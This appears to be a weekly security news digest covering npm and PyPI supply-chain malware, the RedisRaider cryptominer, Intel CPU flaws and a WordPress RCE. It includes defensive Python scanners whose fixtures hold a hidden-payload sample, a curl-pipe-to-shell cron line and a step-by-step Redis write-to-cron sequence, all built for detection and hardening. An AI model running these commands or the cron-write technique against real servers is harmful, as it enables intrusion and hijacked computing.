Programmer’s Digest #135
05/14/2025-05/21/2025 Malicious npm Package Leverages Unicode Steganography; New Go-Based Malware ‘RedisRaider’; New Intel CPU Flaws
1. Malicious npm Package Leverages Unicode Steganography, Google Calendar as C2 Dropper
Cybersecurity researchers have uncovered a malicious npm package, “os-info-checker-es6”, that poses as an operating-system information utility while stealthily delivering a second-stage payload. The malicious code is hidden with Unicode-based steganography (invisible private-use-area characters embedded in otherwise ordinary-looking source), and the decoded stage uses a Google Calendar event short link as a dropper to fetch the final payload, so the attacker’s real infrastructure never appears in the package itself. The package was published on March 19, 2025 by a user named “kim9123” and has been downloaded more than 2,000 times; the malicious code only appeared in a later version, uploaded on May 7, 2025, inside the package’s “preinstall.js” install script, which npm runs automatically during installation. A related package, “skip-tot”, and three others (“vue-dev-serverr”, “vue-dummyy” and “vue-bit”) are linked to the same campaign. Although no further payload is currently being served, researchers believe the campaign may be dormant, narrowly targeted, or still evolving.
Experts warn that attackers increasingly abuse trusted services such as Google Calendar to blend command-and-control traffic into legitimate-looking requests, and urge defenders to monitor behavioral signals (install-time scripts, unexpected network connections from a build) and to vet third-party packages closely.
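The two package-level signals described above, an install-time script and source text padded with invisible Unicode, are cheap to check before a package is installed. The following scanner is an added example for this digest entry, not code from the reported package or from the researchers who analysed it; the sample package, its name and URL are constructed, and the one-byte-per-private-use-character encoding used to build the sample is a hypothetical scheme for illustration, not the campaign’s actual one.

```python
"""Scan an npm package for Unicode steganography and install-time hooks.

Added example for this digest entry, not code from the reported package or from
the researchers who analysed it.  The sample package below is constructed; the
PUA byte-per-character encoding used to build it is a hypothetical scheme for
illustration, not the campaign's actual one.
"""
import json
import unicodedata

# Format/invisible code points that render as nothing and so can hide text.
ZERO_WIDTH = {0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF}
BIDI_CONTROLS = {0x202A, 0x202B, 0x202C, 0x202D, 0x202E, 0x2066, 0x2067, 0x2068, 0x2069}
# npm runs these scripts automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def classify(ch):
    """Label a character as suspicious, or return None for ordinary text."""
    if unicodedata.category(ch) == "Co":        # Private Use Area, any plane
        return "private-use"
    if ord(ch) in ZERO_WIDTH:
        return "zero-width"
    if ord(ch) in BIDI_CONTROLS:
        return "bidi-control"
    return None


def scan_source(text):
    """Count suspicious code points per label and note where each first appears."""
    counts, first_offset = {}, {}
    for i, ch in enumerate(text):
        label = classify(ch)
        if label:
            counts[label] = counts.get(label, 0) + 1
            first_offset.setdefault(label, i)
    return {"counts": counts, "first_offset": first_offset}


def install_hooks(package_json):
    """Return the lifecycle scripts that would run on install."""
    scripts = json.loads(package_json).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def scan_package(files):
    """files: {path: content}. Report install hooks and files hiding characters."""
    report = {"hooks": {}, "suspicious_files": {}}
    if "package.json" in files:
        report["hooks"] = install_hooks(files["package.json"])
    for path, content in files.items():
        if path.endswith((".js", ".mjs", ".cjs", ".json")):
            result = scan_source(content)
            if result["counts"]:
                report["suspicious_files"][path] = result
    return report


def hide_bytes_in_pua(data):
    """Hypothetical encoder used only to build the sample: one PUA char per byte."""
    return "".join(chr(0xE000 + b) for b in data)


def recover_bytes_from_pua(text):
    """Inverse of hide_bytes_in_pua, as an analyst would use when triaging a hit."""
    return bytes(ord(ch) - 0xE000 for ch in text if 0xE000 <= ord(ch) <= 0xE0FF)


# Constructed sample package (name and URL are placeholders).
PAYLOAD = b"fetch('https://example.invalid/stage2')"
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-os-helper",
        "version": "1.0.0",
        "scripts": {"preinstall": "node preinstall.js", "test": "node test.js"},
    }),
    # Looks like a one-liner that prints the platform; the string literal is invisible.
    "preinstall.js": "const os = require('os');\nconst s = '" + hide_bytes_in_pua(PAYLOAD)
                     + "';\nconsole.log(os.platform());\n",
    # Legitimate non-ASCII text is not flagged.
    "index.js": "module.exports = () => 'café → ok';\n",
}

if __name__ == "__main__":
    print(json.dumps(scan_package(SAMPLE_PACKAGE), indent=2))
    print(recover_bytes_from_pua(SAMPLE_PACKAGE["preinstall.js"]))
```

Private-use characters are matched by Unicode category rather than a fixed range so that planes 15 and 16 are covered too, while accented letters, arrows and emoji in ordinary source keep their normal categories and pass. A hit on both checks at once (a lifecycle hook plus a file whose string literals are mostly invisible) is the pattern to block in a registry proxy or CI gate.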
2. New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
Security researchers have discovered RedisRaider, a new malware campaign that compromises publicly exposed, misconfigured Redis servers to mine Monero. Written in Go and heavily obfuscated with Garble, RedisRaider is built for stealth and for propagating from each infected host.
The malware scans the IPv4 space for Redis servers on port 6379, uses the INFO command to confirm that a target runs on Linux, and then abuses legitimate commands rather than any Redis vulnerability: it stores a crontab entry in a key with SET, points the persistence directory at the cron directory with CONFIG SET dir (choosing the file name with CONFIG SET dbfilename), and triggers BGSAVE so that the server itself writes the key’s contents into a cron file. The resulting job downloads and runs the XMRig miner, while the worm covers its tracks with short-lived keys, temporary cron files, and log deletion. RedisRaider’s infrastructure also hosts a browser-based Monero miner, extending the operation to visitors of attacker-controlled web pages. One server involved was linked to multiple services, suggesting the operators’ activity is broader than this campaign. To defend against RedisRaider, experts recommend enabling protected mode, requiring strong authentication, restricting network access to the Redis port, and monitoring for unusual activity such as CONFIG or BGSAVE commands issued by unexpected clients.
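The SET, CONFIG SET and BGSAVE steps above leave a recognisable sequence in Redis’s MONITOR stream, and the hardening advice maps to a handful of redis.conf directives. The following detector and config audit are an added example for this digest entry, not code from the RedisRaider analysis or from the Redis project; the MONITOR lines, IP addresses, script name and configuration snippets are constructed.

```python
"""Flag the RedisRaider-style write-to-cron sequence in Redis MONITOR output and
audit a redis.conf for the settings that make it possible.

Added example for this digest entry; not code from the RedisRaider analysis or
from the Redis project.  MONITOR lines, addresses and configs are constructed.
"""
import re

# MONITOR line: <timestamp> [<db> <client-addr>] "CMD" "arg" ...
LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Five schedule fields then a user/command: the shape of an /etc/cron.d entry.
CRON_LINE_RE = re.compile(r'(?m)^\s*(?:[\d*/,-]+\s+){5}\S+')
# Directories where a dumped RDB file turns into persistence or remote access.
SENSITIVE_DIRS = ("/etc/cron", "/var/spool/cron", "/root", "/home", "/var/www")


def unescape(tok):
    """Undo MONITOR's argument escaping (\\n, \\t, \\r, \\xNN, \\", \\\\)."""
    def repl(m):
        e = m.group(1)
        if len(e) == 3:                      # \xNN
            return chr(int(e[1:], 16))
        return {"n": "\n", "t": "\t", "r": "\r"}.get(e, e)
    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', repl, tok)


def parse_monitor_line(line):
    """Return (client, [args]) or None if the line is not a MONITOR record."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group("client"), [unescape(a) for a in ARG_RE.findall(m.group("args"))]


def detect_cron_write(lines):
    """Track CONFIG SET per client; alert on the SET/CONFIG/BGSAVE steps that drop a cron file."""
    state, alerts = {}, []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[1]:
            continue
        client, args = parsed
        cmd, st = args[0].upper(), state.setdefault(client, {})
        if cmd == "SET" and len(args) >= 3 and CRON_LINE_RE.search(args[2]):
            alerts.append((client, "crontab-like payload stored with SET"))
        elif cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            st[key] = value
            if key == "dir" and value.startswith(SENSITIVE_DIRS):
                alerts.append((client, f"CONFIG SET dir redirected to {value}"))
        elif cmd in ("BGSAVE", "SAVE") and st.get("dir", "").startswith(SENSITIVE_DIRS):
            target = st["dir"].rstrip("/") + "/" + st.get("dbfilename", "dump.rdb")
            alerts.append((client, f"{cmd} will write RDB contents to {target}"))
    return alerts


def audit_redis_conf(conf):
    """Return the weaknesses in a redis.conf that this campaign relies on."""
    directives = {}
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            name, _, value = line.partition(" ")
            directives.setdefault(name.lower(), []).append(value.strip())
    findings = []
    if directives.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode is disabled")
    bind = " ".join(directives.get("bind", []))
    if not bind or "0.0.0.0" in bind or "*" in bind:
        findings.append("bind exposes the instance on all interfaces")
    if not any(k in directives for k in ("requirepass", "aclfile", "user")):
        findings.append("no authentication configured (requirepass or ACL users)")
    renamed = {v.split()[0].upper() for v in directives.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append('CONFIG is reachable by clients (consider rename-command CONFIG "")')
    return findings


# Constructed MONITOR capture: one attacker client, one legitimate client.
SAMPLE_MONITOR = [
    r'1747300000.100000 [0 203.0.113.5:51234] "INFO" "server"',
    r'1747300000.200000 [0 203.0.113.5:51234] "SET" "backup" "\n* * * * * root curl -s http://198.51.100.7/i.sh | sh\n"',
    r'1747300000.300000 [0 203.0.113.5:51234] "CONFIG" "SET" "dir" "/etc/cron.d"',
    r'1747300000.400000 [0 203.0.113.5:51234] "CONFIG" "SET" "dbfilename" "root"',
    r'1747300000.500000 [0 203.0.113.5:51234] "BGSAVE"',
    r'1747300001.000000 [0 10.0.0.12:40000] "GET" "session:abc"',
]
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = (
    "bind 127.0.0.1 -::1\nprotected-mode yes\nport 6379\n"
    "requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET\n"
    'rename-command CONFIG ""\n'
)

if __name__ == "__main__":
    for client, why in detect_cron_write(SAMPLE_MONITOR):
        print(f"ALERT {client}: {why}")
    print("weak:", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

The detector keeps per-client state because the individual commands are all legitimate; only the combination of a redirected `dir` followed by a save is the problem, and the alert names the file the server is about to create. Running MONITOR continuously costs throughput on a busy instance, so in practice the same logic is better fed from a short sampling window or from a proxy that logs commands; the config audit, by contrast, is cheap to run on every deployment.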
3. Researchers Expose New Intel CPU Flaws Enabling Memory Leaks and Spectre v2 Attacks
A new vulnerability, Branch Privilege Injection (BPI), discovered by researchers at ETH Zurich, affects all modern Intel CPUs. BPI abuses the CPU’s branch prediction mechanism to read sensitive data belonging to other users, or to the kernel, on the same processor, reviving concerns around Spectre-style attacks.
The flaw, assigned CVE-2024-45332 (CVSS 5.7), exploits Branch Predictor Race Conditions (BPRC): predictor updates are applied asynchronously to instruction execution, so a prediction trained in one privilege level can briefly be consumed in another, bypassing the privilege boundary the hardware is supposed to enforce. Intel has issued microcode updates to mitigate the risk.
Meanwhile, researchers at Vrije Universiteit Amsterdam (VUSec) detailed new Spectre v2 variants, collectively codenamed Training Solo, in which the attacker trains the branch predictor from within the victim’s own domain rather than from a sandbox; the variants leak kernel memory at up to 17 Kb/s and completely bypass domain isolation.
These include:
- CVE-2024-28956 (CVSS 5.7): Affects Intel Core 9th–11th Gen and Xeon 2nd–3rd Gen.
- CVE-2025-24495 (CVSS 6.8): Affects Intel CPUs with Lion Cove cores.
Intel released microcode patches for both CVEs, and AMD updated its guidance to highlight the risk posed by classic BPF use on its processors.
4. Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts
Cybersecurity researchers have discovered several malicious Python packages on the PyPI repository designed to validate stolen email addresses against TikTok and Instagram APIs, that is, to determine whether each address belongs to a live account. The packages, named checker-SaGaF, steinlurks, and sinnercore, turn a raw list of leaked addresses into a confirmed list of account holders that can be abused in follow-on attacks.
The main package, checker-SaGaF, sent HTTP POST requests to TikTok’s password-recovery API and to Instagram’s account-login endpoints and inferred from the responses whether the submitted email was registered. The malicious payload in these packages resembled the one found in the previously detected “discordpydebug” package, and researchers noted similarities to techniques used by the hacktivist group Phoenix Hyena, although attribution remains tentative. All of the packages have since been removed from PyPI.
5. Malware Found in PyPI Packages Targeting Open-Source Developers
Security researchers have identified a new wave of malicious Python packages on the PyPI repository that specifically target open-source developers. The packages were designed to steal sensitive information and gain unauthorized access to developers’ systems; their malicious code was hidden inside seemingly legitimate packages that were downloaded thousands of times before they were detected.
The packages carried backdoors that let attackers execute arbitrary commands on infected systems, and they attempted to steal authentication tokens and access keys stored on developers’ machines, credentials that can in turn give access to the developers’ own repositories and build pipelines. Researchers recommend that developers review their installed packages immediately, verify package integrity (for example by pinning versions and hashes), and source dependencies only from trusted indexes.
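“Verify package integrity” has a concrete form in the Python ecosystem: pin every dependency to a version and one or more digests, and refuse to install anything that does not match. The verifier below is an added example for this digest entry, not code from pip or from the researchers; it parses the `--hash=sha256:...` syntax that pip’s hash-checking mode (`pip install --require-hashes -r requirements.txt`) uses, and the requirements text and wheel bytes are constructed stand-ins.

```python
"""Verify downloaded Python distributions against a hash-pinned requirements file.

Added example for this digest entry; not code from pip or from the researchers.
It parses the `--hash=sha256:...` syntax that pip's hash-checking mode uses and
compares each artifact's digest before anything is installed.  The requirements
text and wheel bytes below are constructed stand-ins.
"""
import hashlib
import re

REQ_RE = re.compile(r'^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*(?P<version>[^\s\\]+)')
HASH_RE = re.compile(r'--hash=(?P<alg>sha256|sha384|sha512):(?P<digest>[0-9a-fA-F]+)')


def canonical(name):
    """Normalise a distribution name the way package indexes compare them."""
    return re.sub(r'[-_.]+', '-', name).lower()


def parse_pinned_requirements(text):
    """Return {name: {"version": ..., "hashes": {alg: {digest, ...}}}}.

    Every requirement must be pinned with == and carry at least one --hash,
    which is the same rule pip enforces under --require-hashes.
    """
    joined = re.sub(r'\\\s*\n', ' ', text)           # join backslash continuations
    pins = {}
    for raw in joined.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('-'):          # blank, comment, or option line
            continue
        m = REQ_RE.match(line)
        if not m:
            raise ValueError(f"unpinned or unparsable requirement: {line!r}")
        hashes = {}
        for h in HASH_RE.finditer(line):
            hashes.setdefault(h.group('alg'), set()).add(h.group('digest').lower())
        if not hashes:
            raise ValueError(f"requirement without --hash: {line!r}")
        pins[canonical(m.group('name'))] = {"version": m.group('version'), "hashes": hashes}
    return pins


def verify_artifact(pins, name, data):
    """Return (ok, reason) for the bytes of one downloaded wheel or sdist."""
    pin = pins.get(canonical(name))
    if pin is None:
        return False, "not in pinned requirements"
    for alg, digests in pin["hashes"].items():
        if hashlib.new(alg, data).hexdigest() in digests:
            return True, f"{alg} digest matches pin for version {pin['version']}"
    return False, "digest matches none of the pinned hashes"


# Constructed artifacts: a stand-in wheel and a tampered copy of it.
GOOD_WHEEL = b"PK\x03\x04 constructed stand-in for example_pkg-1.0.0-py3-none-any.whl"
TAMPERED_WHEEL = GOOD_WHEEL + b"\n# injected code"
# Two --hash entries per requirement is normal, e.g. one wheel and one sdist.
REQUIREMENTS = f"""\
# constructed requirements.txt in pip hash-checking format
example-pkg==1.0.0 \\
    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()} \\
    --hash=sha256:{'0' * 64}
"""

if __name__ == "__main__":
    pins = parse_pinned_requirements(REQUIREMENTS)
    for label, blob in (("good", GOOD_WHEEL), ("tampered", TAMPERED_WHEEL)):
        print(label, verify_artifact(pins, "example_pkg", blob))
```

The parser is deliberately strict: an unpinned or hash-less line is an error rather than a warning, because a single such line is enough for a dependency resolver to pull an attacker-controlled release. Hash pinning does not help against a package that was malicious when the pin was taken, so it complements, rather than replaces, reviewing what is installed.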
6. Remote Code Execution Vulnerability Found in ROME Theme Kit
A critical remote code execution (RCE) vulnerability has been discovered in the ROME Theme Kit, a popular WordPress theme framework. The flaw affects all versions of the theme released before the fix and could allow attackers to execute arbitrary code on vulnerable websites. It stems from insufficient input validation in certain theme functions, which lets attacker-controlled input reach code paths that execute it.
Website administrators are strongly advised to update to the latest patched version of the theme immediately. They should also review server access logs for suspicious activity and consider additional layers such as a web application firewall and regular security scans to reduce the window in which the flaw can be exploited.